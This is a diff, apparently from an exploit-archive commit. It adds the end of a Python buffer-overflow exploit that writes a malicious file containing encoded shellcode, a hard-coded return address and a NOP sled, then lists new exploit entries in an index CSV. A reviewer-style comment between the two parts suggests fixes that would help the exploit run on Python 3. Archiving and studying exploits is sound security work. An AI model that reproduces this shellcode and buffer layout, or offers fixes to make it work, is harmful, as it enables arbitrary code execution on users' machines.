+shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" +
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" +
+"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30" +
+"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b" +
+"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42" +
+"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a" +
+"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c" +
+"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f" +
+"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67" +
+"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71" +
+"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54" +
+"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58" +
+"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c" +
+"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61" +
+"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d" +
+"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43" +
+"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52" +
+"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56" +
+"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51" +
+"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69" +
+"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49" +
+"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a" +
+"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73" +
+"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62" +
+"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77" +
+"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30" +
+"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50" +
+"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30" +
+"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a" +
+"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77" +
+"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32" +
+"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50" +
+"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51" +
+"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70" +
+"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66" +
+"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46" +
+"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d" +
+"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74" +
+"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e" +
+"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c" +
+"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e" +
+"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47" +
+"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d" +
+"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d" +
+"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30" +
+"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73" +
+"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55" +
+"\x41\x41")
+
+
+#74302E3F comctl32.DLL
+buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10)
+file.write(buffer)
+file.close()
\ No newline at end of file
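Review bot: The trailing padding term `"C"*(260-256-4-10)` on the `buffer` line evaluates to `"C"*(-10)`, and a negative repeat count in Python silently yields an empty string, so that term contributes nothing and the arithmetic misleads a reader about the final buffer layout. Either drop the term or replace it with a comment stating the intended layout, e.g. `# 256 filler bytes + 4-byte address + 10-byte NOP sled + shellcode; no tail padding`. Separately, the file is opened with `'wb'` but `buffer` and `shellcode` are `str` literals, which only works under Python 2; on Python 3 `file.write(buffer)` raises `TypeError`, and the bare `#!/usr/bin/python` shebang does not pin the interpreter, so either prefix the literals with `b` or state the Python 2 requirement in the header comments. Naming the handle `file` also shadows the Python 2 builtin; a `with open('exploit.txt', 'wb') as out:` block would avoid that and guarantee the close.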
diff --git a/files_exploits.csv b/files_exploits.csv
index 3e592b65a..7164028fe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6507,6 +6507,8 @@ id,file,description,date,author,type,platform,port
47102,exploits/windows/dos/47102.txt,"Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays",2019-07-10,"Google Security Research",dos,windows,
47103,exploits/windows/dos/47103.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings",2019-07-10,"Google Security Research",dos,windows,
47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
+47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
+47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10589,6 +10591,7 @@ id,file,description,date,author,type,platform,port
47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
+47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41493,3 +41496,6 @@ id,file,description,date,author,type,platform,port
47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
+47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
+47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
+47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80